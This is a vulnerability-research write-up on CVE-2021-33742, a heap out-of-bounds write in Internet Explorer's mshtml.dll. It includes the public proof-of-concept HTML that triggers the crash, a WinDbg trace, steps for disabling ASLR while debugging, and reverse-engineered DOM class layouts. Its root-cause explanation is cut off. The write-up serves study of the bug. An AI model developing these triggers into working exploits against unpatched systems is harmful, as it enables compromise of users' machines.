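Vulnerability Background
On July 14, 2021, Google's Threat Analysis Group (TAG) published an article titled "How We Protect Users From 0-Day Attacks". It disclosed details of four 0-day vulnerabilities exploited in the wild that TAG discovered in 2021: CVE-2021-21166 and CVE-2021-30551 in Google Chrome, CVE-2021-33742 in Internet Explorer, and CVE-2021-1879 in Apple Safari.
In April 2021, TAG discovered a campaign targeting Armenian users. It used malicious Office documents to make Internet Explorer load a remote malicious web page, which exploited a vulnerability in the Internet Explorer rendering engine. The malicious document either embedded a remote ActiveX object through a Shell.Explorer.1 OLE object, or used a VBA macro to spawn an Internet Explorer process and navigate to the malicious page. The vulnerability used in this attack was assigned CVE-2021-33742 and was fixed by Microsoft in June 2021.
Microsoft plans to retire Internet Explorer 11 in June 2022 and replace it with its newer browser, Microsoft Edge. To stay compatible with legacy sites, Microsoft Edge has a built-in Internet Explorer mode. In principle there is little left to gain from studying Internet Explorer vulnerabilities, yet several Internet Explorer 0-days were still exploited in the wild this year, for example CVE-2021-26411 and CVE-2021-40444, so this research still has some value.
The vulnerability analyzed in this article lives in the Trident rendering (layout) engine. Even in the latest Windows 11, both the Trident engine (mshtml.dll) and the EdgeHTML engine (edgehtml.dll) are still present. Trident is the layout engine used by Internet Explorer. Its first version shipped with Internet Explorer 4 in October 1997, and it kept gaining new technology with each later Internet Explorer release. In Trident 7.0 (used by Internet Explorer 11), Microsoft made major changes to the engine, adding new technology and improving support for web standards. EdgeHTML is a proprietary layout engine developed by Microsoft for Microsoft Edge. It is a fork of Trident, but it removes all the legacy code inherited from older Internet Explorer versions and rewrites the core code to interoperate with other modern browsers.
After TAG published the article mentioned above, details of these vulnerabilities were also published on the Google Project Zero blog. This article is a record of my analysis of CVE-2021-33742 in Internet Explorer. I have analyzed vulnerabilities in older versions of Internet Explorer before, but this is my first reasonably formal analysis of a vulnerability in a recent version, so please forgive any errors or omissions.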
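Vulnerability Overview
CVE-2021-33742 is a heap out-of-bounds write in the Trident rendering engine (mshtml.dll) of Internet Explorer. It is triggered when JavaScript uses the DOM innerHTML property to set the content (including a text string) of an internal html element. Changing the content between tags through innerHTML changes the structure of the DOM tree/DOM stream that IE has built, so IE calls functions of the CSpliceTreeEngine class to adjust that structure. When CSpliceTreeEngine::RemoveSplice() is called to remove part of the DOM tree/DOM stream and the removed part happens to contain a text string, a heap out-of-bounds write can occur.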
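Analysis Environment
Extracting the vulnerable module
64-bit Windows 10 ships both a 32-bit and a 64-bit Internet Explorer, located in "C:\Program Files (x86)\Internet Explorer" and "C:\Program Files\internet explorer" respectively. The Trident rendering engine (mshtml.dll) for each architecture, however, is located at "C:\Windows\SysWOW64\mshtml.dll" and "C:\Windows\System32\mshtml.dll". A 64-bit operating system can run both 32-bit and 64-bit software: "Program Files (x86)" and "SysWOW64" hold the modules of 32-bit software, while "Program Files" and "System32" hold the modules of 64-bit software. 32-bit software cannot run directly on a 64-bit system, so Microsoft designed WoW64 (Windows-on-Windows 64-bit), which uses three DLLs (Wow64.dll, Wow64win.dll and Wow64cpu.dll) to switch between 32-bit and 64-bit mode when running 32-bit software.
For this analysis I used the Trident rendering engine (mshtml.dll) of the 32-bit Internet Explorer, that is, "C:\Windows\SysWOW64\mshtml.dll".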
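Disabling ASLR
With ASLR disabled, debugging is more convenient because the load addresses of DLL modules no longer change between debugging sessions. On Windows 10, mitigations are turned off through Windows Defender. Open Windows Defender, select "App & browser control", find "Exploit protection" and choose "Exploit protection settings". Note that the settings page has two tabs, "System settings" and "Program settings". Start with "System settings": the ASLR-related options are "Force randomization for images (Mandatory ASLR)", "Randomize memory allocations (Bottom-up ASLR)" and "High-entropy ASLR", and all of them should be turned off. Turn off "High-entropy ASLR" first, then the other two.
"Force randomization for images (Mandatory ASLR)": when this option is on, the load addresses of all modules are randomized regardless of whether they were built with the "/DYNAMICBASE" option, including modules built without it. To check whether a module was built with "/DYNAMICBASE", use "Detect It Easy" to see whether the "IMAGE_NT_HEADERS -> IMAGE_OPTIONAL_HEADER -> DllCharacteristics -> IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE" flag is set in the PE file.
"Randomize memory allocations (Bottom-up ASLR)": when this option is on, the addresses of heap blocks obtained through malloc() or HeapAlloc() are randomized to some degree.
"High-entropy ASLR": this option works together with "Randomize memory allocations (Bottom-up ASLR)". When it is on, heap block addresses are randomized to a greater degree on top of bottom-up ASLR.
Next, look at "Program settings". Windows 10 allows mitigations to be turned on or off per application, and these per-program settings override the "System settings". As a result, DLL load addresses may keep changing even after every ASLR-related mitigation has been turned off under "System settings". Switch to the "Program settings" tab, find iexplore.exe, click Edit, and clear the "Override system settings" checkbox for every ASLR-related setting.
After changing the settings, reboot the operating system.
Even then, you may find that module load addresses are still not fixed. In that case, use a hex editor to set NT Headers -> Optional Header -> DllCharacteristics -> IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE to 0 in the PE header, and replace the original module with the patched one. This disables ASLR for Internet Explorer completely. I recommend 010 Editor here: its Templates feature makes it easy to modify this flag.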
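The flag check and the patch described above come down to one bit in the 16-bit DllCharacteristics field. The following is a minimal sketch, not a PE parser: the helper names are hypothetical, and only the constant 0x0040 (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) comes from the PE format.

```cpp
#include <cstdint>

// Value of IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE as defined by the PE format.
constexpr std::uint16_t kDynamicBase = 0x0040;

// Hypothetical helper: true if the module opted in to ASLR (/DYNAMICBASE).
constexpr bool has_dynamic_base(std::uint16_t dll_characteristics) {
    return (dll_characteristics & kDynamicBase) != 0;
}

// Hypothetical helper: the same field value with the DYNAMIC_BASE bit cleared,
// which is the edit made by hand in the hex editor.
constexpr std::uint16_t clear_dynamic_base(std::uint16_t dll_characteristics) {
    return static_cast<std::uint16_t>(dll_characteristics & ~kDynamicBase);
}
```

Reading the field out of a real file still requires locating the optional header first. The sketch covers only the bit manipulation.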
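Reproducing the Vulnerability
I used the PoC provided by Ivan Fratric of Google Project Zero.
<html>
<head>
<script>
var b = document.createElement("html");
b.innerHTML = Array(40370176).toString();
b.innerHTML = "";
</script>
</head>
<body>
</body>
</html>
The original PoC is so minimal that nothing visible happens when it runs, which made it harder for me to understand the execution flow. I therefore tried the following modified PoCs to observe their effect.
<html>
<head>
<script>
window.onload = function() {
    var b = document.createElement("html");
    document.body.appendChild(b);
    var arr = Array(4);
    for (var i = 0; i < 4; i++) {
        arr[i] = 'A';
    }
    b.innerHTML = arr.toString();
}
</script>
</head>
<body>
</body>
</html>
The result is as follows:
We can draw the following conclusions. Through the HTML DOM method document.createElement(), the PoC creates an "html" node (which also creates "head" and "body" nodes) and appends the new "html" node to the existing "body" node. It then creates an Array and initializes it. Finally, it converts the array to a string and, through the HTML DOM innerHTML property, adds it to the "body" node inside the newly created "html" node.
The original PoC does not initialize the Array it creates. We can use Chrome's developer tools to see what an uninitialized Array becomes when converted to a string. This helps later when debugging the PoC and inspecting the memory that holds the string.
As shown, when an initialized Array is converted to a string, its elements are separated by ",". An uninitialized Array converts to nothing but a run of "," characters, one fewer than the number of array elements.
<html>
<head>
<script>
window.onload = function() {
    var b = document.createElement("html");
    document.body.appendChild(b);
    b.innerHTML = Array(40370176).toString();
    b.innerHTML = "";
}
</script>
</head>
<body>
</body>
</html>
In my tests, PoC2 also causes the crash. As for the argument to document.createElement(), only the "html" element triggers the crash; other tags do not seem to (though I am not certain of this).
Now let's reproduce the vulnerability under a debugger, using the original PoC. First open Internet Explorer and drag the PoC into it. A prompt appears saying "Internet Explorer restricted this webpage from running scripts or ActiveX controls", which means the JavaScript in the page has not run yet. Now open WinDbg, attach to iexplore.exe, enter the g command to continue, and click "Allow blocked content" in the Internet Explorer prompt (a refresh may be needed). Internet Explorer then hits an exception, and WinDbg catches it and breaks in. The crash context is shown below: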
(211c.80c): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffd`64a43150 cc int 3
0:015> g
ModLoad: 00000000`70a90000 00000000`70aaf000 C:\Windows\SysWOW64\WLDP.DLL
ModLoad: 00000000`771f0000 00000000`77235000 C:\Windows\SysWOW64\WINTRUST.dll
Invalid parameter passed to C runtime function.
(211c.2320): Access violation - code c0000005 (first chance) <---- memory access violation
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:
63a46809 66893c50 mov word ptr [eax+edx*2],di ds:002b:26e1a024=????
0:004:x86> r
eax=2211a020 ebx=0504cb38 ecx=04915644 edx=02680002 esi=0504ca08 edi=0000fdef
eip=63a46809 esp=0504c7a8 ebp=0504c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:
63a46809 66893c50 mov word ptr [eax+edx*2],di ds:002b:26e1a024=????
0:004:x86> !address 26e1a024
Usage: Free
Base Address: 00000000`22e1c000
End Address: 00000000`63580000
Region Size: 00000000`40764000 ( 1.007 GB)
State: 00010000 MEM_FREE
Protect: 00000001 PAGE_NOACCESS <---- not accessible
Type: <info not present at the target>
Content source: 0 (invalid), length: 3c765fdc
0:004:x86> k
 # ChildEBP RetAddr
00 0504c9f0 63a44fe6 MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9
01 0504cb1c 63b91ff9 MSHTML!Tree::TreeWriter::SpliceTreeInternal+0x8d
02 0504cbf8 63bca8e3 MSHTML!CDoc::CutCopyMove+0x148759
03 0504cc2c 63a80d38 MSHTML!RemoveWithBreakOnEmpty+0x1499bd
04 0504cd7c 63a80a5d MSHTML!InjectHtmlStream+0x29b
05 0504cdc0 63a81a2f MSHTML!HandleHTMLInjection+0x86
06 0504ceb8 63a816a2 MSHTML!CElement::InjectInternal+0x2c9
07 0504cf2c 63a815ba MSHTML!CElement::InjectTextOrHTML+0xdf
08 0504cf58 63a8153c MSHTML!CElement::Var_set_innerHTML+0x51
09 0504cf80 6dd74dae MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x3c
0a 0504cfec 6dcfed4e JSCRIPT9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
0b 0504d018 6dcfec9d JSCRIPT9!<lambda_58b9ba9eeb8f97b5e624add39c5039e7>::operator()+0xa0
0c 0504d044 6dcfec21 JSCRIPT9!ThreadContext::ExecuteImplicitCall<<lambda_58b9ba9eeb8f97b5e624add39c5039e7> >+0x73
0d 0504d090 6dc6583c JSCRIPT9!Js::JavascriptOperators::CallSetter+0x4b
0e 0504d0b0 6dc65527 JSCRIPT9!Js::InlineCache::TrySetProperty<1,1,1,1,0>+0x10c
0f 0504d104 6dd6eb85 JSCRIPT9!Js::InterpreterStackFrame::DoProfiledSetProperty<Js::OpLayoutElementCP_OneByte const >+0x97
10 0504d11c 6dccf89b JSCRIPT9!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutElementCP_OneByte const >+0x19
11 0504d158 6dcc5208 JSCRIPT9!Js::InterpreterStackFrame::Process+0x1b6b
12 0504d284 007f0fe9 JSCRIPT9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x2a8
WARNING: Frame IP not in any known module. Following frames may be wrong.
13 0504d290 6dd73bb3 0x7f0fe9
14 0504d2d0 6dcfeb62 JSCRIPT9!Js::JavascriptFunction::CallFunction<1>+0x93
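From the WinDbg output we can see that the PoC causes an access violation with exception code 0xc0000005. The faulting instruction at 0x63a46809 writes a 16-bit value to an address that !address reports as a free region with PAGE_NOACCESS protection, which causes the crash. The stack backtrace printed by the k command shows that the faulting code is in MSHTML!CSpliceTreeEngine::RemoveSplice().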
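The faulting address can be checked by hand from the register dump. The operand is [eax+edx*2], so the following minimal sketch recomputes it with a hypothetical helper, using the eax and edx values shown by the r command.

```cpp
#include <cstdint>

// Effective address of an x86 memory operand of the form [base + index*scale].
// Unsigned 32-bit arithmetic wraps modulo 2^32, as it does on a 32-bit CPU.
constexpr std::uint32_t effective_address(std::uint32_t base,
                                          std::uint32_t index,
                                          std::uint32_t scale) {
    return base + index * scale;
}
```

With eax=0x2211a020 and edx=0x02680002 the result is 0x26e1a024, which matches the ds:002b:26e1a024 operand that WinDbg prints for the faulting instruction.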
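Structure of the Internet Explorer DOM Tree
When web developers today think of a DOM tree, they usually picture a tree like this:
Such a tree looks very simple. In reality, however, Internet Explorer's implementation of the DOM tree is quite complex.
Put simply, Internet Explorer's DOM tree was designed for the web pages of the 1990s. When the original data structures were designed, a web page was mainly a document viewer (containing at most a few animated GIFs and other static images). The algorithms and data structures therefore resembled those behind document viewers such as Microsoft Word. Recall that in the early days of the web JavaScript did not yet exist and page content could not be manipulated by script, so the DOM tree as we know it did not exist. Text was the main content of a page, and the internal structure of the DOM tree was designed around fast, efficient text storage and manipulation. Content editing (WYSIWYG: What You See Is What You Get) and an operating paradigm centered on the editing cursor, used for character insertion and limited formatting, were characteristic of web development at the time.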
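A Text-Centric Design
Because of its text-centric design, the original structure of the DOM was built around a text backing store, a complex system of text arrays that could split and join text efficiently with few or no memory allocations. The backing store represents text and tags as a linear structure, addressable through a global index or character position (CP). Inserting text at a given CP is very efficient, and copying or pasting a range of text is handled centrally by an efficient "splice" operation. The figure below illustrates how simple markup containing "hello world" is loaded into the text backing store and how a CP is assigned to every character and tag.
The text backing store provides special placeholders for non-text entities such as tags and the insertion point.
To store non-text data (such as formatting and grouping information), another set of objects is maintained separately from the backing store: a doubly linked list of tree positions (TreePos objects). TreePos objects are semantically equivalent to the tags in HTML source markup, and each logical element is represented by a begin TreePos and an end TreePos. This linear structure makes it very fast to walk the whole DOM tree in depth-first pre-order, which almost every DOM search API and CSS/layout algorithm needs. Later, Microsoft extended the TreePos object with two more kinds of "position": TreeDataPos (a placeholder that indicates text) and PointerPos (which indicates things such as the caret, that is, the text insertion point, and range boundary points, and was eventually used for newer features such as generated content nodes).
Each TreePos object also includes a CP, which serves as a global ordinal index for the tag (useful for things like the legacy document.all API). The CP is needed to get from a TreePos into the text backing store. It makes comparing node order easy, and the length of a run of text can even be obtained by subtracting CP indexes.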
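To make the CP idea concrete, here is a minimal sketch of assigning character positions to a linear stream of tags and text. The StreamItem type, the function names and the choice of 0 as the first CP are all assumptions made for illustration. They are not the structures used by mshtml.dll.

```cpp
#include <string>
#include <vector>

// Hypothetical model of one entry in the linear stream: a tag edge or a text run.
struct StreamItem {
    bool is_tag;       // true for a begin-tag or end-tag placeholder
    std::string text;  // tag name, or the characters of the text run
};

// Character positions occupied by an item: one per tag, one per text character.
inline long item_cch(const StreamItem& item) {
    return item.is_tag ? 1 : static_cast<long>(item.text.size());
}

// Starting CP of every item, counting from 0 (an assumption of this sketch).
inline std::vector<long> assign_cps(const std::vector<StreamItem>& stream) {
    std::vector<long> cps;
    long cp = 0;
    for (const StreamItem& item : stream) {
        cps.push_back(cp);
        cp += item_cch(item);
    }
    return cps;
}
```

For a stream holding a begin tag, the text "hello world" and an end tag, subtracting the CP of the text from the CP of the end tag gives 11, the length of the text. This is the subtraction trick mentioned above.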
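To tie these together, a TreeNode binds a pair of TreePos objects and establishes the "tree" hierarchy that the JavaScript DOM expects, as shown below:
Adding Layers of Complexity
The CP design made the original DOM very complex. For the whole system to work, CPs had to be up to date, so they were updated after every DOM operation (for example typing text, copy/paste, DOM API calls, and even clicking the page, which sets an insertion point in the DOM). Initially DOM operations were driven mainly by the HTML parser or by user actions, so a model in which CPs were always current was entirely reasonable. With the rise of JavaScript and DHTML, however, these operations became more and more common and frequent.
To keep updates fast, new structures were added to the DOM, and the splay tree (SplayTree) appeared: a series of overlapping tree links added on top of the TreePos objects. At first the added complexity improved DOM performance, allowing global CP updates in O(log n). However, a splay tree is really optimized only for repeated local searches (for example, changes centered on one position in the DOM tree) and did not prove equally effective for JavaScript and its more random access patterns.
Another design phenomenon was that the "splice" operation mentioned earlier for copy/paste was extended to handle all tree mutations. The core "Splice Engine" works in three steps, as shown below:
In step 1, the engine "records" the splice by walking the tree positions (TreePos) from the start of the operation to its end. It then creates a splice record containing the command instructions for this operation (a structure reused in the browser's undo stack).
In step 2, all nodes associated with the operation (TreeNode and TreePos objects) are removed from the tree. Note that in the IE DOM tree, TreeNode/TreePos objects are distinct from the Element objects referenced by script, which makes overlapping tags easier to handle, so removing them is not a functional problem.
Finally, in step 3, the splice record is used to "replay" (re-create) new objects at the target location. For example, to carry out an appendChild DOM operation, the Splice Engine creates a range around the node (from the TreeNode's begin TreePos to its end TreePos), "splices" this range out of the old location, and creates new nodes to represent the node and its children at the new location. As you can imagine, besides being algorithmically inefficient, this caused a great deal of memory allocation churn.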
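The Original DOM Was Not Encapsulated
These are only a few examples of the complexity of the Internet Explorer DOM. Worse, the original DOM was not encapsulated, so code all the way from the parser to the display system depended on CP/TreePos, and untangling this took many years of development time.
Complexity breeds bugs, and the complexity of the DOM code base was a burden on reliability. According to an internal investigation, from IE7 to IE11 about 28% of IE reliability bugs originated in the core DOM components. The complexity also directly reduced IE's flexibility: each new HTML5 feature became more expensive to implement, because fitting new ideas into the existing architecture grew harder.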
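Root Cause Analysis
Reverse engineering the classes in mshtml.dll related to this vulnerability
The reverse engineering relied mainly on the pdb files provided by Microsoft and on the previously leaked IE 5.5 source code.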
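CSpliceTreeEngine
This is the class that does the actual work for SpliceTree, that is, the core class of the Splice Engine described above. SpliceTree can remove, copy, move, or undo a remove on a range of the tree. Functions of this class are called whenever the DOM tree changes.
The following notes on what the class does are taken from comments in the IE source code:
Remove:
1. This SpliceTree behavior removes all text in the specified range, as well as all elements that fall entirely within the range.
2. The semantics are such that if an element is not entirely within the range, its end tags are not moved relative to other elements. However, the number of nodes for that element may need to be reduced. When this happens, nodes are removed from the right edge.
3. Pointers (CTreeDataPos) in the range that do not have cling end up in the space between the begin tags and the end tags (arguably, that is where they should be placed). Pointers with cling are removed.
Copy:
1. All text in the specified range is copied, as well as all elements that fall entirely within the range.
2. Elements that overlap the range on the left are copied; their begin edges are implied at the very beginning of the range, in the same order in which the begin edges appear in the source.
3. Elements that overlap the range on the right are copied; their end edges are implied at the very end of the range, in the same order in which the end edges appear in the source.
Move:
1. All text in the specified range, as well as all elements that fall entirely within the range, is moved (removed and inserted at the new location, not copied).
2. Elements that overlap on the right or left are modified using the same rules as Remove, then copied to the new location using the same rules as Copy.
Undo a Remove:
1. This SpliceTree operation can only be called from the undo code. In essence it is a Move driven by the data saved by an earlier Remove. What makes it more complicated is that the saved data has to be woven into the tree that already exists.
Below are most of the members of the IE11 CSpliceTreeEngine class object, as I recovered them by reverse engineering.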
+0x000 bool _fInsert,
+0x001 bool _fRemove,
+0x002 bool _fDOMOperation,
+0x003
+0x004
+0x005
+0x006
+0x007
+0x008
...
+0x00C CMarkup *_pMarkupSource,
+0x010 CTreeNode *_pnodeSourceTop,
+0x014 CTreePos *_ptpSourceL,
+0x018 CTreePos *_ptpSourceR,
+0x01C CTreeNode *_pnodeSourceL,
+0x020 CTreeNode *_pnodeSourceR,
+0x024 CMarkup *_pMarkupTarget,
+0x028 CTreePos *_ptpTarget,
+0x02C CTreeNode *_pnodeTarget,
+0x030 TCHAR *_pchRecord,
+0x034 LONG _cchRecord,
+0x038 LONG _cchRecordAlloc,
+0x03C CSpliceRecord *_prec,
+0x040 LONG _crec,
+0x044 WhichAry _cAry,
+0x048 BOOL _fReversed,
+0x04C CSpliceRecordList *_paryRemoveUndo,
+0x050 BOOL _fNoFreeRecord,
+0x054 BOOL Flags,
+0x058 CSpliceRecordList * ,
+0x05C ,
+0x060 CElement **_ppelRight,
...
+0x070 CSpliceRecordList _aryLeft,
+0x080 CSpliceRecordList _aryInside,
+0x090 CPtrAry<CElement*> _aryElementRight,
+0x09C CPtrAry<CElement*> ,
+0x0A8 CRemoveSpliceUndo _RemoveUndo,
+0x0E4 CInsertSpliceUndo _InsertUndo,
Below is the constructor of the IE11 CSpliceTreeEngine class, as I recovered it by reverse engineering.
void __thiscall CSpliceTreeEngine::CSpliceTreeEngine(CSpliceTreeEngine *this, CDoc *pDoc)
{
  CSpliceRecordList *aryInside;
  CRemoveSpliceUndo *pRemoveSpliceUndo;
  CSpliceRecordList *v5;
  CInsertSpliceUndo *pInsertSpliceUndo;
  int InitValue;

  this->_aryLeft.ElementCount_Flags = 0;
  this->_aryLeft.MaxElementCount = 0;
  this->_aryLeft.pData = 0;
  aryInside = &this->_aryInside;
  aryInside->ElementCount_Flags = 0;
  aryInside->MaxElementCount = 0;
  aryInside->pData = 0;
  this->_aryLeft.field_C = 1;
  this->_aryLeft.field_D &= 0xFEu;
  aryInside->field_D &= 0xFEu;
  aryInside->field_C = 1;
  memset(&this->_aryElementRight, 0, 0x18u);
  CMarkupUndoBase::CMarkupUndoBase(&this->_RemoveUndo, pDoc, 0, 0);
  pRemoveSpliceUndo->pVtbl = &CRemoveSpliceUndo::`vftable';
  pRemoveSpliceUndo->field_28 = v5;
  pRemoveSpliceUndo->field_30 = v5;
  CMarkupUndoBase::CMarkupUndoBase(&this->_InsertUndo, pDoc, v5, v5);
  pInsertSpliceUndo->pVtbl = &CInsertSpliceUndo::`vftable';
  memset(this, InitValue, 0x70u);
}
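CTreeNode
Every pair of tags in the HTML source corresponds to one CTreeNode object in IE. The _tpBegin and _tpEnd members of each CTreeNode identify the begin tag and the end tag of that pair. In IE11, the low 12 bits of the third DWORD of a CTreeNode hold the tag type. Using the enum ELEMENT_TAG enumeration from the IE 5.5 source and the global g_atagdesc table in the pdb file, the enumeration values of most tags in the current mshtml.dll can be worked out.
Below are some of the members of the IE11 CTreeNode class object, as I recovered them by reverse engineering.
+0x000 CElement *_pElement,
+0x004 CTreeNode *_pNodeParent,
+0x008 DWORD _FlagsAndEtag,
+0x00C CTreePos _tpBegin,
+0x024 CTreePos _tpEnd,
+0x03C SHORT _iCF,
+0x03E SHORT _iPF,
+0x040 SHORT _iFF,
+0x042 SHORT _iSF,
+0x044 DWORD _ulRefs_Flags,
+0x048 ...
+0x054 CFancyFormat *_pFancyFormat,
+0x058 ...
CTreePos
Every begin tag and every end tag has a corresponding CTreePos object, which is embedded in the CTreeNode object. Through a CTreePos object, the position of any tag in the DOM stream and in the DOM tree can be found. IE builds the actual DOM tree from the _pFirstChild and _pNext members of CTreePos objects, and builds the DOM stream (a doubly linked list) from the _pLeft and _pRight members.
The EType enumeration below gives the type of the element that a CTreePos object corresponds to.
enum EType {
    Uninit  = 0x0,
    NodeBeg = 0x1,
    NodeEnd = 0x2,
    Text    = 0x4,
    Pointer = 0x8
};
The enumeration below describes the relationship between a CTreePos object and the CTreePos objects linked to it in the DOM tree, as well as the type of the CTreePos object.
enum {
    TPF_ETYPE_MASK  = 0x0F,
    TPF_LEFT_CHILD  = 0x10,
    TPF_LAST_CHILD  = 0x20,
    TPF_EDGE        = 0x40,
    TPF_DATA2_POS   = 0x40,
    TPF_DATA_POS    = 0x80,
    TPF_FLAGS_MASK  = 0xFF,
    TPF_FLAGS_SHIFT = 8
};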
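The flag values above can be used to decode a raw _cElemLeftAndFlags DWORD from a memory dump. The following is a minimal sketch: the DecodedPos struct and decode_pos function are hypothetical names, and treating the bits above TPF_FLAGS_SHIFT as the element count is an inference from the constant names rather than something confirmed by symbols.

```cpp
#include <cstdint>

// Constants copied from the enumeration above.
constexpr std::uint32_t kEtypeMask  = 0x0F;  // TPF_ETYPE_MASK
constexpr std::uint32_t kLeftChild  = 0x10;  // TPF_LEFT_CHILD
constexpr std::uint32_t kLastChild  = 0x20;  // TPF_LAST_CHILD
constexpr std::uint32_t kDataPos    = 0x80;  // TPF_DATA_POS
constexpr std::uint32_t kFlagsMask  = 0xFF;  // TPF_FLAGS_MASK
constexpr std::uint32_t kFlagsShift = 8;     // TPF_FLAGS_SHIFT

// Hypothetical decoded view of one _cElemLeftAndFlags value.
struct DecodedPos {
    std::uint32_t elem_left;  // bits above the flag byte (assumed element count)
    std::uint32_t flags;      // low 8 bits
    std::uint32_t etype;      // NodeBeg=1, NodeEnd=2, Text=4, Pointer=8
    bool left_child;
    bool last_child;
    bool data_pos;
};

inline DecodedPos decode_pos(std::uint32_t raw) {
    DecodedPos d;
    d.flags      = raw & kFlagsMask;
    d.elem_left  = raw >> kFlagsShift;
    d.etype      = d.flags & kEtypeMask;
    d.left_child = (d.flags & kLeftChild) != 0;
    d.last_child = (d.flags & kLastChild) != 0;
    d.data_pos   = (d.flags & kDataPos) != 0;
    return d;
}
```

As an example, the value 0x00000271 decodes to an element count of 2 and a flag byte of 0x71, that is, a NodeBeg position with both child flags set.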
Below are the complete members of the IE11 CTreePos class object, as I recovered them by reverse engineering.
+0x000 DWORD _cElemLeftAndFlags,
+0x004 DWORD _cchLeft,
+0x008 CTreePos *_pFirstChild,
+0x00C CTreePos *_pNext,
+0x010 CTreePos *_pLeft,
+0x014 CTreePos *_pRight,
CTreeNode::InitBeginPos() initializes the CTreePos object that corresponds to the begin tag.
CTreePos *__thiscall CTreeNode::InitBeginPos(CTreeNode *this, BOOL fEdge)
{
  CTreePos *_tpBegin;

  _tpBegin = &this->_tpBegin;
  this->_tpBegin._cElemLeftAndFlags = this->_tpBegin._cElemLeftAndFlags & 0xFFFFFF31 | (fEdge ? 0x41 : 1);
  return _tpBegin;
}
CTreeNode::InitEndPos() initializes the CTreePos object that corresponds to the end tag.
CTreePos *__thiscall CTreeNode::InitEndPos(CTreeNode *this, BOOL fEdge)
{
  CTreePos *_tpEnd;

  _tpEnd = &this->_tpEnd;
  this->_tpEnd._cElemLeftAndFlags = this->_tpEnd._cElemLeftAndFlags & 0xFFFFFF32 | (fEdge ? 0x42 : 2);
  return _tpEnd;
}
CTreePos::GetCch() returns the number of characters occupied by the element that the current CTreePos object corresponds to. A begin or end tag counts as 1 character (in the code below, this is the value of the TPF_EDGE bit), a text string counts as the number of characters it actually holds, and the character count for pointer data is obtained in CTreePos::GetContentCch() (0 or 1). This was mentioned earlier in "A Text-Centric Design" when the DOM stream structure was introduced.
LONG __thiscall CTreePos::GetCch(CTreeDataPos *this)
{
  DWORD cElemLeftAndFlags;

  cElemLeftAndFlags = this->_cElemLeftAndFlags;
  if ( (this->_cElemLeftAndFlags & 3) != 0 )
    return (cElemLeftAndFlags >> 6) & 1;
  if ( (cElemLeftAndFlags & 4) != 0 )
    return this->dptp.t._sid_cch & 0x1FFFFFF;
  return 0;
}
CTreeDataPos
CTreeDataPos derives from CTreePos. It extends CTreePos to represent text data and pointer data. It is the key class involved in this vulnerability.
class CTreeDataPos : public CTreePos
{
    ...
protected:
    union {
        DATAPOSTEXT t;
        DATAPOSPOINTER p;
    };
    ...
};

struct DATAPOSTEXT
{
    unsigned long _cch:25;
    unsigned long _sid:7;
    long _lTextID;
};

struct DATAPOSPOINTER
{
    DWORD_PTR _dwPointerAndGravityAndCling;
};
Below are the complete members of the IE11 CTreeDataPos class object, as I recovered them by reverse engineering.
+0x000 DWORD _cElemLeftAndFlags,
+0x004 DWORD _cchLeft,
+0x008 CTreePos *_pFirstChild,
+0x00C CTreePos *_pNext,
+0x010 CTreePos *_pLeft,
+0x014 CTreePos *_pRight,
+0x018 ULONG _ulRefs_Flags,
+0x01C System::SmartObject *pSmartObject,
+0x020 Tree::TextData *_pTextData,
+0x024 DATAPOSTEXT t,
+0x024 DATAPOSPOINTER p,
Tree::TreeWriter::AllocData1Pos() allocates and initializes a CTreeDataPos object of the pointer-data kind. In IE8 this function was CMarkup::AllocData1Pos().
CTreeDataPos *__stdcall Tree::TreeWriter::AllocData1Pos()
{
  CTreeDataPos *pTreeDataPos;
  ULONG Flags;

  pTreeDataPos = MemoryProtection::HeapAllocClear<1>(g_hIsolatedHeap, 0x28u);
  if ( pTreeDataPos )
  {
    Flags = pTreeDataPos->_ulRefs_Flags & 0x37;
    pTreeDataPos->pSmartObject = 0;
    pTreeDataPos->_pTextData = 0;
    pTreeDataPos->_cElemLeftAndFlags |= 0x80u;
    pTreeDataPos->_ulRefs_Flags = Flags | 0x40;
    pTreeDataPos->_pNext = 0;
  }
  return pTreeDataPos;
}
Tree::TreeWriter::AllocData2Pos() allocates and initializes a CTreeDataPos object of the text-data kind. In IE8 this function was CMarkup::AllocData2Pos().
CTreeDataPos *__stdcall Tree::TreeWriter::AllocData2Pos()
{
  CTreeDataPos *pTreeDataPos;
  ULONG Flags;

  pTreeDataPos = MemoryProtection::HeapAllocClear<1>(g_hIsolatedHeap, 0x2Cu);
  if ( pTreeDataPos )
  {
    Flags = pTreeDataPos->_ulRefs_Flags;
    pTreeDataPos->pSmartObject = 0;
    pTreeDataPos->_pTextData = 0;
    pTreeDataPos->_cElemLeftAndFlags |= 0xC0u;
    pTreeDataPos->_ulRefs_Flags = Flags & 0x37 | 0x40;
  }
  return pTreeDataPos;
}
The IE11 CTreeDataPos has a new member, _pTextData, which did not exist in IE8 and earlier. Previously, text data was stored in the CTxtArray class and accessed through the CTxtPtr class. IE11 did not abolish the old mechanism but added a new way to store text data alongside it, the Tree::TextData class.
CTreeDataPos::SetTextData() sets the Tree::TextData object pointer stored in the _pTextData member of a CTreeDataPos object.
void __thiscall CTreeDataPos::SetTextData(CTreeDataPos *this, Tree::TextData *pNewTextData)
{
  Tree::TextData *pOldTextData;

  ++pNewTextData->_ulRefs;
  pOldTextData = this->_pTextData;
  if ( pOldTextData )
  {
    if ( pOldTextData->_ulRefs-- == 1 )
      MemoryProtection::HeapFree(g_hProcessHeap, pOldTextData);
  }
  this->_pTextData = pNewTextData;
}
CTreeDataPos::GetTextLength() can obtain the length of a text string from either of the two structures that store text, CTxtArray and Tree::TextData. The root cause of this vulnerability is that the _cch member of the DATAPOSTEXT structure in CTreeDataPos (25 bits) and the _cch member of Tree::TextData (32 bits) differ in size but are used interchangeably, which leads to the heap out-of-bounds write. The details are covered later in the root cause analysis.
